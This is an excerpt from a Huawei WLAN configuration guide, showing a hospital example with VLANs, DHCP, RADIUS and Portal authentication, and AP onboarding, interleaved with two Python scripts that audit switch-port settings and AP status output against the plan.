V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN
V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
A hospital needs to deploy wired and wireless networks in the hospital building to meet service requirements. To make management and maintenance easy, the administrator requires that wired and wireless users be centrally managed on the AC, that non-authentication and Portal authentication be configured for the wired and wireless users respectively, and that wireless users can roam under the same AC.
As shown in Figure 15-3, the AC connects to the egress gateway Router in the uplink direction. In the downlink direction, the AC connects to and manages APs through the S5700-1 and S5700-2 access switches, which are deployed on the first and second floors respectively. In each room, an AP2010DN is deployed to provide both wired and wireless access. An AP5030DN is deployed in the corridor to provide wireless network coverage. The S5700-1 and S5700-2 are PoE switches and directly supply power to the connected APs.
To facilitate network planning and management, the access switches are only used to transparently transmit data at Layer 2, and all gateways are configured on the AC. The AC functions as the DHCP server to allocate IP addresses to APs, STAs, and PCs.


Figure 15-3 Networking diagram for configuring unified access for wired and wireless users
[Figure: Internet - Router - AC. The AC connects to the Router through GE1/0/4 and to the Agile Controller through GE1/0/3; GE1/0/1 connects to the S5700-1 and GE1/0/2 to the S5700-2 (each switch uses GE0/0/1 towards the AC). S5700-1 GE0/0/2, GE0/0/3 and GE0/0/4 connect to AP101, AP102 and AP103; S5700-2 GE0/0/2, GE0/0/3 and GE0/0/4 connect to AP201, AP202 and AP203.]

Data Planning

Table 15-6 Network data planning

Item | Interface | VLAN | Description
AC | GE1/0/1 | 100, 201 | Connected to the S5700-1
AC | GE1/0/2 | 100, 202 | Connected to the S5700-2
AC | GE1/0/3 | 200 | Connected to the Agile Controller
AC | GE1/0/4 | 300 | Connected to the egress gateway
S5700-1 | GE0/0/1 | 100, 201 | Connected to the AC
S5700-1 | GE0/0/2 | 100, 201 | Connected to AP101
S5700-1 | GE0/0/3 | 100, 201 | Connected to AP102
S5700-1 | GE0/0/4 | 100, 201 | Connected to AP103
S5700-2 | GE0/0/1 | 100, 202 | Connected to the AC
S5700-2 | GE0/0/2 | 100, 202 | Connected to AP201
S5700-2 | GE0/0/3 | 100, 202 | Connected to AP202
S5700-2 | GE0/0/4 | 100, 202 | Connected to AP203
AP101 and AP102 | Eth0/0/0, Eth0/0/1, GE0/0/0 | 201 | GE0/0/0 connects to the S5700-1. Eth0/0/0 and Eth0/0/1 connect to wired users. AP101 and AP102 are AP2010DNs deployed in rooms on the first floor to provide wired and wireless access.
AP103 | - | - | AP103 is an AP5030DN deployed in the corridor on the first floor to provide wireless access.
AP201 and AP202 | Eth0/0/0, Eth0/0/1, GE0/0/0 | 202 | GE0/0/0 connects to the S5700-2. Eth0/0/0 and Eth0/0/1 connect to wired users. AP201 and AP202 are AP2010DNs deployed in rooms on the second floor to provide wired and wireless access.
AP203 | - | - | AP203 is an AP5030DN deployed in the corridor on the second floor to provide wireless access.

Table 15-7 Service data planning

Item | Data | Description
IP address of the AC's source interface | 10.23.100.1/24 | -
Country code | CN | -
WMM profile | Name: wmm | -
Radio profile | Name: radio | -
Security profile | Name: security; security and authentication policy: OPEN | -
Traffic profile | Name: traffic | -
Service set | Name: floor_1; SSID: hospital-wlan; WLAN virtual interface: WLAN-ESS1; data forwarding mode: tunnel forwarding | Provides WLAN network coverage for the first floor.
Service set | Name: floor_2; SSID: hospital-wlan; WLAN virtual interface: WLAN-ESS2; data forwarding mode: tunnel forwarding | Provides WLAN network coverage for the second floor.
DHCP server | The AC functions as the DHCP server to allocate IP addresses to APs, STAs, and PCs. | -
AP gateway and IP address pool range | VLANIF100: 10.23.100.1/24, 10.23.100.2-10.23.100.254/24 | -
Gateway and IP address pool range of the wireless users | VLANIF101: 10.23.101.1/24, 10.23.101.2-10.23.101.254/24; VLANIF102: 10.23.102.1/24, 10.23.102.2-10.23.102.254/24 | -
Gateway and IP address pool range of the wired users | VLANIF201: 10.23.201.1/24, 10.23.201.2-10.23.201.254/24; VLANIF202: 10.23.202.1/24, 10.23.202.2-10.23.202.254/24 | -
Server parameters: authentication server | IP address: 10.23.200.1; port number: 1812; RADIUS shared key: Admin@123 | The Service Controller (SC) of the Agile Controller provides RADIUS server and Portal server functions; therefore, the IP addresses of the authentication server, accounting server, authorization server, and Portal server are all the IP address of the SC.
Server parameters: accounting server | IP address: 10.23.200.1; port number: 1813; RADIUS shared key: Admin@123 | Configure a RADIUS accounting server to collect user login and logout information. The port numbers of the authentication server and accounting server must be the same as those of the RADIUS server.
Server parameters: authorization server | IP address: 10.23.200.1; RADIUS shared key: Admin@123 | Configure an authorization server to enable the RADIUS server to deliver authorization rules to the AC. The shared key of the authorization server must be the same as those of the authentication server and accounting server.
Server parameters: Portal server | IP address: 10.23.200.1; port number that the AC uses to listen on Portal protocol packets: 2000; destination port number in the packets that the AC sends to the Portal server: 50200; Portal shared key: Admin@123; encryption key for the URL parameters that the AC sends to the Portal server: Admin@123 | -

Table 15-8 Radio channel data planning

Item | Data | Description
AP101 | Radio 0: channel 1 and power level 10 | Use the WLAN Planner to plan AP installation locations, and the working channel and power of the AP radio. Set the channel mode and power mode to fixed, and configure the channel and power for each AP. (Applies to all APs in this table.)
AP102 | Radio 0: channel 6 and power level 10 | See above.
AP103 | Radio 0: channel 11 and power level 10; Radio 1: channel 153 and power level 10 | See above.
AP201 | Radio 0: channel 1 and power level 10 | See above.
AP202 | Radio 0: channel 6 and power level 10 | See above.
AP203 | Radio 0: channel 11 and power level 10; Radio 1: channel 157 and power level 10 | See above.

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure all network devices to enable the APs, S5700-1, S5700-2, and AC to
communicate with upper-layer devices.
2. Configure the AC as a DHCP server to assign IP addresses to APs, wired users, and
wireless users.
3. Configure a RADIUS server template, and configure authentication, accounting, and
authorization in the template, and configure Portal authentication.
4. Configure basic WLAN services, including AC system parameters, AP management, and
WLAN service parameters.
5. Configure VAPs and deliver VAP parameters to APs.
6. Verify the configuration to ensure that both wired and wireless users can access the
Internet.

Procedure
Step 1 Configure network devices to communicate with each other.
# Add interfaces GE0/0/1 to GE0/0/4 of the S5700-1 and S5700-2 to VLAN 100
(management VLAN), interfaces GE0/0/1 to GE0/0/4 of the S5700-1 to VLAN 201 (VLAN
for wired service packets), and interfaces GE0/0/1 to GE0/0/4 of the S5700-2 to VLAN 202
(VLAN for wireless service packets). Set PVIDs for interfaces directly connected to APs, and
you are also advised to configure port isolation on these interfaces to reduce broadcast
packets. The S5700-1 is used as an example here. The configuration on the S5700-2 is similar.
For details, see the configuration file of the S5700-2.
[HUAWEI] sysname S5700-1
[S5700-1] vlan batch 100 201
[S5700-1] interface gigabitethernet 0/0/1
[S5700-1-GigabitEthernet0/0/1] port link-type trunk
[S5700-1-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/1] quit
[S5700-1] interface gigabitethernet 0/0/2
[S5700-1-GigabitEthernet0/0/2] port link-type trunk
[S5700-1-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/2] port trunk pvid vlan 100 //Set a PVID for the interface directly connected to the AP.
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to reduce broadcast packets.
[S5700-1-GigabitEthernet0/0/2] quit
[S5700-1] interface gigabitethernet 0/0/3
[S5700-1-GigabitEthernet0/0/3] port link-type trunk
[S5700-1-GigabitEthernet0/0/3] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/3] port trunk pvid vlan 100
[S5700-1-GigabitEthernet0/0/3] port-isolate enable
[S5700-1-GigabitEthernet0/0/3] quit
[S5700-1] interface gigabitethernet 0/0/4
[S5700-1-GigabitEthernet0/0/4] port link-type trunk
[S5700-1-GigabitEthernet0/0/4] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/4] port trunk pvid vlan 100
[S5700-1-GigabitEthernet0/0/4] port-isolate enable
[S5700-1-GigabitEthernet0/0/4] quit
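The rules applied to the AP-facing ports above (trunk carrying the management VLAN 100 and the floor's service VLAN, PVID set to VLAN 100, port isolation enabled) can be checked mechanically before the access switch goes into service. The following Python audit is an added example, not part of this document or Huawei's code; it parses session-style output like the block above or a plain configuration file, and reports every AP-facing port that breaks a rule, using inputs constructed from this example.

```python
"""Audit the AP-facing ports of an S5700 access switch against the rules applied in
Step 1 of this example: trunk allowing the management VLAN and the floor's service
VLAN, PVID set to the management VLAN, and port isolation enabled so that users behind
different APs cannot reach each other at Layer 2 through the access switch.
Added example, not Huawei's code; VLAN numbers follow Table 15-6."""
import re

MGMT_VLAN = 100  # management VLAN of this example (VLANIF100, AP address pool)


def parse_interfaces(config_text):
    """Split VRP configuration text (session form with "[...]" prompts, or plain
    configuration-file form) into {normalized interface name: [commands]}."""
    stanzas, current = {}, None
    for raw in config_text.splitlines():
        line = re.sub(r"^\[[^\]]*\]\s*", "", raw).strip()  # drop "[S5700-1-...]" prompt
        line = line.split("//", 1)[0].strip()               # drop a trailing //comment
        if not line:
            continue
        m = re.match(r"^interface\s+(.+)$", line, re.I)
        if m:
            current = re.sub(r"\s+", "", m.group(1)).lower()  # "gigabitethernet0/0/2"
            stanzas.setdefault(current, [])
        elif line in ("quit", "#"):  # leaves the interface view / ends the stanza
            current = None
        elif current is not None:
            stanzas[current].append(line.lower())
    return stanzas


def parse_vlan_list(tokens):
    """Expand a VRP VLAN list such as ['100', '201'] or ['100', 'to', '110'] into a set."""
    vlans, i = set(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def audit_ap_ports(config_text, ap_ports, service_vlan, mgmt_vlan=MGMT_VLAN):
    """Return [(interface, problem), ...] for every AP-facing port that breaks a rule."""
    findings = []
    if service_vlan == mgmt_vlan:
        findings.append(("global", "management VLAN and service VLAN must not be the same"))
    stanzas = parse_interfaces(config_text)
    for port in ap_ports:
        cmds = stanzas.get(re.sub(r"\s+", "", port).lower())
        if cmds is None:
            findings.append((port, "interface is not configured"))
            continue
        allowed, pvid, isolated = set(), None, False
        for cmd in cmds:
            t = cmd.split()
            if t[:4] == ["port", "trunk", "allow-pass", "vlan"]:
                allowed |= parse_vlan_list(t[4:])
            elif t[:4] == ["port", "trunk", "pvid", "vlan"]:
                pvid = int(t[4])
            elif t[:2] == ["port-isolate", "enable"]:
                isolated = True
        missing = {mgmt_vlan, service_vlan} - allowed
        if missing:
            findings.append((port, f"trunk does not allow VLAN(s) {sorted(missing)}"))
        if pvid != mgmt_vlan:
            findings.append((port, f"PVID is {pvid}, expected management VLAN {mgmt_vlan}"))
        if not isolated:
            findings.append((port, "port isolation is not enabled"))
    return findings


# Constructed input 1: an AP-facing port of the S5700-1 exactly as configured in Step 1.
S5700_1_OK = """\
[S5700-1] interface gigabitethernet 0/0/2
[S5700-1-GigabitEthernet0/0/2] port link-type trunk
[S5700-1-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/2] port trunk pvid vlan 100 //Set a PVID for the AP port.
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Reduce broadcast packets.
[S5700-1-GigabitEthernet0/0/2] quit
"""

# Constructed input 2 (configuration-file form): GE0/0/4 breaks all three rules.
S5700_2_BAD = """\
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100 202
 port-isolate enable
#
interface GigabitEthernet0/0/4
 port link-type trunk
 port trunk pvid vlan 202
 port trunk allow-pass vlan 202
"""

if __name__ == "__main__":
    print(audit_ap_ports(S5700_1_OK, ["gigabitethernet 0/0/2"], 201))
    print(audit_ap_ports(S5700_2_BAD, ["GigabitEthernet0/0/2", "GigabitEthernet0/0/4"], 202))
```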

# On the AC, add GE1/0/1 connected to the S5700-1 to VLAN 100 and VLAN 201, GE1/0/2
connected to the S5700-2 to VLAN 100 and VLAN 202, GE1/0/4 connected to the upper-
layer network to VLAN 300, and GE1/0/3 connected to the Agile Controller to VLAN 200.
[HUAWEI] sysname AC
[AC] vlan batch 100 200 201 202 300
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 201
[AC-GigabitEthernet1/0/1] quit
[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 202
[AC-GigabitEthernet1/0/2] quit
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 200
[AC-GigabitEthernet1/0/3] quit
[AC] interface gigabitethernet 1/0/4
[AC-GigabitEthernet1/0/4] port link-type trunk
[AC-GigabitEthernet1/0/4] port trunk allow-pass vlan 300
[AC-GigabitEthernet1/0/4] quit

# Configure VLANIF 200 for communication between the AC and Agile Controller.
[AC] interface vlanif200
[AC-Vlanif200] ip address 10.23.200.2 24 //Configure an IP address for communication between the AC and Agile Controller.
[AC-Vlanif200] quit

Step 2 Configure the AC as a DHCP server to assign IP addresses to PCs, APs, and STAs.
# Configure the AC to assign IP addresses to PCs, APs, and STAs from an interface address
pool.
[AC] dhcp enable
[AC] vlan batch 101 102
[AC] interface vlanif 100 //Configure an interface address pool to allocate IP addresses to APs.
[AC-Vlanif100] description manage_ap
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit
[AC] interface vlanif 101 //Configure an interface address pool to allocate IP addresses to STAs on the first floor.
[AC-Vlanif101] description manage_floor1_sta
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit
[AC] interface vlanif 102 //Configure an interface address pool to allocate IP addresses to STAs on the second floor.
[AC-Vlanif102] description manage_floor2_sta
[AC-Vlanif102] ip address 10.23.102.1 24
[AC-Vlanif102] dhcp select interface
[AC-Vlanif102] quit
[AC] interface vlanif 201 //Configure an interface address pool to allocate IP addresses to PCs on the first floor.
[AC-Vlanif201] description manage_floor1_pc
[AC-Vlanif201] ip address 10.23.201.1 24
[AC-Vlanif201] dhcp select interface
[AC-Vlanif201] quit
[AC] interface vlanif 202 //Configure an interface address pool to allocate IP addresses to PCs on the second floor.
[AC-Vlanif202] description manage_floor2_pc
[AC-Vlanif202] ip address 10.23.202.1 24
[AC-Vlanif202] dhcp select interface
[AC-Vlanif202] quit

Step 3 Configure a RADIUS server template, and configure authentication, accounting, and
authorization in the template, and configure Portal authentication.

# Configure a RADIUS server template on the AC, and configure authentication, accounting,
and authorization in the template.
[AC] radius-server template radius1 //Create the RADIUS server template radius1.
[AC-radius-radius1] radius-server authentication 10.23.200.1 1812 source ip-address 10.23.200.2 weight 80 //Configure the RADIUS authentication server and authentication port 1812. The AC uses the IP address 10.23.200.2 to communicate with the RADIUS server.
[AC-radius-radius1] radius-server accounting 10.23.200.1 1813 source ip-address 10.23.200.2 weight 80 //Configure the RADIUS accounting server to collect user login and logout information and set the accounting port number to 1813. The AC uses the IP address 10.23.200.2 to communicate with the RADIUS server.
[AC-radius-radius1] radius-server shared-key cipher Admin@123 //Configure the shared key for the RADIUS server.
[AC-radius-radius1] undo radius-server user-name domain-included //The user name that the device sends to the RADIUS server does not carry the domain name. Configure this command when the RADIUS server does not accept user names that carry the domain name.
[AC-radius-radius1] quit
[AC] radius-server authorization 10.23.200.1 shared-key cipher Admin@123 //Configure an IP address for the RADIUS authorization server and set the shared key to Admin@123, the same as the authentication and accounting keys. Configure the authorization server so that the RADIUS server can deliver authorization rules to the AC.
[AC] aaa
[AC-aaa] authentication-scheme radius1 //Create the authentication scheme radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Agile Controller functions as the RADIUS server, the authentication mode must be set to RADIUS.
[AC-aaa-authen-radius1] quit
[AC-aaa] accounting-scheme radius1 //Create the accounting scheme radius1.
[AC-aaa-accounting-radius1] accounting-mode radius //Set the accounting mode to RADIUS. To facilitate account status information maintenance on the RADIUS server, including the login, logout, and forced logout information, the accounting mode must be set to RADIUS.
[AC-aaa-accounting-radius1] quit
[AC-aaa] domain portal1 //Create the domain portal1.
[AC-aaa-domain-portal1] authentication-scheme radius1 //Bind the authentication scheme radius1.
[AC-aaa-domain-portal1] accounting-scheme radius1 //Bind the accounting scheme radius1.
[AC-aaa-domain-portal1] radius-server radius1 //Bind the RADIUS server template radius1.
[AC-aaa-domain-portal1] quit
[AC-aaa] quit

# Configure the Portal server.
[AC] web-auth-server portal1 //Create the Portal server template portal1.
[AC-web-auth-server-portal1] server-ip 10.23.200.1 //Configure an IP address for the Portal server.
[AC-web-auth-server-portal1] port 50200 //Set the destination port number used by the device to send packets to the Portal server to 50200 (default setting).
[AC-web-auth-server-portal1] shared-key cipher Admin@123 //Configure the shared key for message exchange between the AC and Portal server.
[AC-web-auth-server-portal1] url http://10.23.200.1:8080/portal //Configure the URL for the Portal server.
[AC-web-auth-server-portal1] quit

# Bind the Portal server template to the WLAN-ESS interface, enable Portal authentication
for wireless users, and configure non-authentication for wired users.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] domain name portal1 force //Configure the forcible user domain portal1.
[AC-Wlan-Ess1] domain name portal1 //Configure the default user domain portal1.
[AC-Wlan-Ess1] authentication portal //Configure Portal authentication.
[AC-Wlan-Ess1] web-auth-server portal1 direct //Bind the Portal server template portal1 and specify Layer 2 authentication as the Portal authentication mode.
[AC-Wlan-Ess1] quit
[AC] interface wlan-ess 2
[AC-Wlan-Ess2] domain name portal1 force //Configure the forcible user domain portal1.
[AC-Wlan-Ess2] domain name portal1 //Configure the default user domain portal1.
[AC-Wlan-Ess2] authentication portal //Configure Portal authentication.
[AC-Wlan-Ess2] web-auth-server portal1 direct //Bind the Portal server template portal1 and specify Layer 2 authentication as the Portal authentication mode.
[AC-Wlan-Ess2] quit

Step 4 Configure AC system parameters.

# Configure the AC's country code.
[AC] wlan ac-global country-code cn //Configure the AC country code. Radio features of APs managed by the AC must conform to local laws and regulations. The default country code is CN.
Warning: Modifying the country code will clear channel configurations of the AP radio using the country code and reset the AP. If the new country code does not support the radio, all configurations of the radio are cleared. Continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the AC's source interface.
[AC] capwap source interface vlanif 100
[AC] wlan

Step 5 Manage the APs on the AC.

# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
APs offline according to the obtained AP type IDs.
[AC-wlan-view] ap id 101 type-id 38 mac 60de-4476-e320 //Add the AP2010DN offline with the MAC address 60de-4476-e320 and AP ID 101.
[AC-wlan-ap-101] quit
[AC-wlan-view] ap id 102 type-id 38 mac 60de-4476-e340 //Add the AP2010DN offline with the MAC address 60de-4476-e340 and AP ID 102.
[AC-wlan-ap-102] quit
[AC-wlan-view] ap id 103 type-id 35 mac dcd2-fc04-b520 //Add the AP5030DN offline with the MAC address dcd2-fc04-b520 and AP ID 103.
[AC-wlan-ap-103] quit
[AC-wlan-view] ap id 201 type-id 38 mac 60de-4476-e360 //Add the AP2010DN offline with the MAC address 60de-4476-e360 and AP ID 201.
[AC-wlan-ap-201] quit
[AC-wlan-view] ap id 202 type-id 38 mac 60de-4476-e380 //Add the AP2010DN offline with the MAC address 60de-4476-e380 and AP ID 202.
[AC-wlan-ap-202] quit
[AC-wlan-view] ap id 203 type-id 35 mac dcd2-fc04-b540 //Add the AP5030DN offline with the MAC address dcd2-fc04-b540 and AP ID 203.
[AC-wlan-ap-203] quit

# Configure AP regions and add the APs to the AP regions.
[AC-wlan-view] ap-region id 1 //Create AP region 1 and add the APs on the first floor to it.
[AC-wlan-ap-region-1] ap-region-name floor1 //Name AP region 1 floor1.
[AC-wlan-ap-region-1] quit
[AC-wlan-view] ap id 101
[AC-wlan-ap-101] region-id 1 //Add AP 101 to AP region 1.
[AC-wlan-ap-101] quit
[AC-wlan-view] ap id 102
[AC-wlan-ap-102] region-id 1
[AC-wlan-ap-102] quit
[AC-wlan-view] ap id 103
[AC-wlan-ap-103] region-id 1
[AC-wlan-ap-103] quit
[AC-wlan-view] ap-region id 2 //Create AP region 2 and add the APs on the second floor to it.
[AC-wlan-ap-region-2] ap-region-name floor2
[AC-wlan-ap-region-2] quit
[AC-wlan-view] ap id 201
[AC-wlan-ap-201] region-id 2
[AC-wlan-ap-201] quit
[AC-wlan-view] ap id 202
[AC-wlan-ap-202] region-id 2
[AC-wlan-ap-202] quit
[AC-wlan-view] ap id 203
[AC-wlan-ap-203] region-id 2
[AC-wlan-ap-203] quit

# Power on the APs and run the display ap all command to check the AP running status. If
the AP State field displays as normal, the APs are online on the AC.
[AC-wlan-view] display ap all
All AP(s) information:
Normal[6],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID  AP Type   AP MAC          Profile ID/Region ID  AP State  AP Sysname
------------------------------------------------------------------------------
101 AP2010DN 60de-4476-e320 0/1 normal ap-101
102 AP2010DN 60de-4476-e340 0/1 normal ap-102
103 AP5030DN dcd2-fc04-b520 0/1 normal ap-103
201 AP2010DN 60de-4476-e360 0/2 normal ap-201
202 AP2010DN 60de-4476-e380 0/2 normal ap-202
203 AP5030DN dcd2-fc04-b540 0/2 normal ap-203
------------------------------------------------------------------------------
Total number: 6,printed: 6
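As an added example (not part of this document or Huawei's code), the following Python script parses display ap all output like the one above and compares it with the AP plan of Step 5: every planned AP must be listed with its planned type, MAC address and AP region and be in the normal state, and an AP that is online without being in the plan is reported as well. Both sample outputs are constructed from this example; the unplanned AP's MAC address is made up.

```python
"""Check 'display ap all' output against the AP plan of this example. Added example,
not Huawei's code; the plan comes from the 'ap id ... type-id ... mac ...' and
'region-id' commands of Step 5."""
import re

# AP ID -> (AP type, MAC address, AP region ID), as configured in Step 5.
AP_PLAN = {
    101: ("AP2010DN", "60de-4476-e320", 1),
    102: ("AP2010DN", "60de-4476-e340", 1),
    103: ("AP5030DN", "dcd2-fc04-b520", 1),
    201: ("AP2010DN", "60de-4476-e360", 2),
    202: ("AP2010DN", "60de-4476-e380", 2),
    203: ("AP5030DN", "dcd2-fc04-b540", 2),
}

# One AP row: "101 AP2010DN 60de-4476-e320 0/1 normal ap-101"
#             ID  Type     MAC            Profile/Region State Sysname
ROW_RE = re.compile(
    r"^\s*(?P<id>\d+)\s+(?P<type>\S+)\s+"
    r"(?P<mac>[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4})\s+"
    r"(?P<profile>\d+)/(?P<region>\d+)\s+(?P<state>\S+)\s+(?P<sysname>\S+)\s*$",
    re.I,
)


def parse_display_ap_all(output):
    """Return {ap_id: {"type", "mac", "region", "state", "sysname"}} from the AP rows."""
    aps = {}
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:  # header, separator and summary lines do not match the row pattern
            aps[int(m["id"])] = {
                "type": m["type"],
                "mac": m["mac"].lower(),
                "region": int(m["region"]),
                "state": m["state"].lower(),
                "sysname": m["sysname"],
            }
    return aps


def check_ap_status(output, plan=AP_PLAN):
    """Return a list of problem strings; an empty list means the output matches the plan."""
    aps = parse_display_ap_all(output)
    problems = []
    for ap_id, (ap_type, mac, region) in sorted(plan.items()):
        ap = aps.get(ap_id)
        if ap is None:
            problems.append(f"AP {ap_id}: not listed in display ap all")
            continue
        if ap["type"] != ap_type:
            problems.append(f"AP {ap_id}: type {ap['type']}, expected {ap_type}")
        if ap["mac"] != mac.lower():
            problems.append(f"AP {ap_id}: MAC {ap['mac']}, expected {mac}")
        if ap["region"] != region:
            problems.append(f"AP {ap_id}: region {ap['region']}, expected {region}")
        if ap["state"] != "normal":
            problems.append(f"AP {ap_id}: state {ap['state']}, expected normal")
    # An AP the AC lists but the plan does not know about deserves a look: it was
    # added outside the plan, and its traffic is not covered by the planned VLANs.
    for ap_id in sorted(set(aps) - set(plan)):
        problems.append(f"AP {ap_id}: listed but not in the plan (MAC {aps[ap_id]['mac']})")
    return problems


# Constructed sample 1: the output printed in Step 5 of this example.
DISPLAY_AP_ALL_OK = """\
All AP(s) information:
Normal[6],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID  AP Type   AP MAC          Profile ID/Region ID  AP State  AP Sysname
------------------------------------------------------------------------------
101 AP2010DN 60de-4476-e320 0/1 normal ap-101
102 AP2010DN 60de-4476-e340 0/1 normal ap-102
103 AP5030DN dcd2-fc04-b520 0/1 normal ap-103
201 AP2010DN 60de-4476-e360 0/2 normal ap-201
202 AP2010DN 60de-4476-e380 0/2 normal ap-202
203 AP5030DN dcd2-fc04-b540 0/2 normal ap-203
------------------------------------------------------------------------------
Total number: 6,printed: 6
"""

# Constructed sample 2: AP103 is in the wrong region, AP202 is in the fault state,
# AP203 never came online, and an unplanned AP (made-up MAC address) is online.
DISPLAY_AP_ALL_BAD = """\
101 AP2010DN 60de-4476-e320 0/1 normal ap-101
102 AP2010DN 60de-4476-e340 0/1 normal ap-102
103 AP5030DN dcd2-fc04-b520 0/2 normal ap-103
201 AP2010DN 60de-4476-e360 0/2 normal ap-201
202 AP2010DN 60de-4476-e380 0/2 fault ap-202
301 AP2010DN 60de-4476-e3a0 0/2 normal ap-301
"""

if __name__ == "__main__":
    for name, out in (("ok", DISPLAY_AP_ALL_OK), ("bad", DISPLAY_AP_ALL_BAD)):
        print(name, check_ap_status(out) or "all APs match the plan")
```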

# Configure the AP2010DN's uplink interface GE0/0/0 and downlink interfaces Eth0/0/0 and
Eth0/0/1 to allow wired service packets to pass through.
[AC-wlan-view] ap id 101
[AC-wlan-ap-101] lineate-port ethernet 0 pvid vlan 201 //The downlink interface of the AP2010DN is used to connect wired terminals, such as PCs. Set a PVID for the interface. VLAN 201 is used to transmit wired service packets of the first floor.
[AC-wlan-ap-101] lineate-port ethernet 0 vlan untagged 201 //The downlink interface of the AP2010DN is used to connect wired terminals. Add the interface to VLAN 201 in untagged mode.
[AC-wlan-ap-101] lineate-port ethernet 1 pvid vlan 201
[AC-wlan-ap-101] lineate-port ethernet 1 vlan untagged 201
[AC-wlan-ap-101] lineate-port gigabitethernet 0 vlan tagged 201 //The uplink interface of the AP2010DN is used to connect to the upper-layer devices. Add the interface to VLAN 201 in tagged mode.
[AC-wlan-ap-101] quit
[AC-wlan-view] ap id 102
[AC-wlan-ap-102] lineate-port ethernet 0 pvid vlan 201
[AC-wlan-ap-102] lineate-port ethernet 0 vlan untagged 201
[AC-wlan-ap-102] lineate-port ethernet 1 pvid vlan 201
[AC-wlan-ap-102] lineate-port ethernet 1 vlan untagged 201
[AC-wlan-ap-102] lineate-port gigabitethernet 0 vlan tagged 201
[AC-wlan-ap-102] quit
[AC-wlan-view] ap id 201
[AC-wlan-ap-201] lineate-port ethernet 0 pvid vlan 202 //The downlink interface of the AP2010DN is used to connect wired terminals, such as PCs. Set a PVID for the interface. VLAN 202 is used to transmit wired service packets of the second floor.
[AC-wlan-ap-201] lineate-port ethernet 0 vlan untagged 202
[AC-wlan-ap-201] lineate-port ethernet 1 pvid vlan 202
[AC-wlan-ap-201] lineate-port ethernet 1 vlan untagged 202
[AC-wlan-ap-201] lineate-port gigabitethernet 0 vlan tagged 202
[AC-wlan-ap-201] quit
[AC-wlan-view] ap id 202
[AC-wlan-ap-202] lineate-port ethernet 0 pvid vlan 202
[AC-wlan-ap-202] lineate-port ethernet 0 vlan untagged 202
[AC-wlan-ap-202] lineate-port ethernet 1 pvid vlan 202
[AC-wlan-ap-202] lineate-port ethernet 1 vlan untagged 202
[AC-wlan-ap-202] lineate-port gigabitethernet 0 vlan tagged 202
[AC-wlan-ap-202] quit

Step 6 Configure WLAN service parameters.

# Create the WMM profile wmm.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create the radio profile radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] power-mode fixed //Set the power mode of the radio to fixed.
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode of the radio to fixed.
[AC-wlan-radio-prof-radio] quit
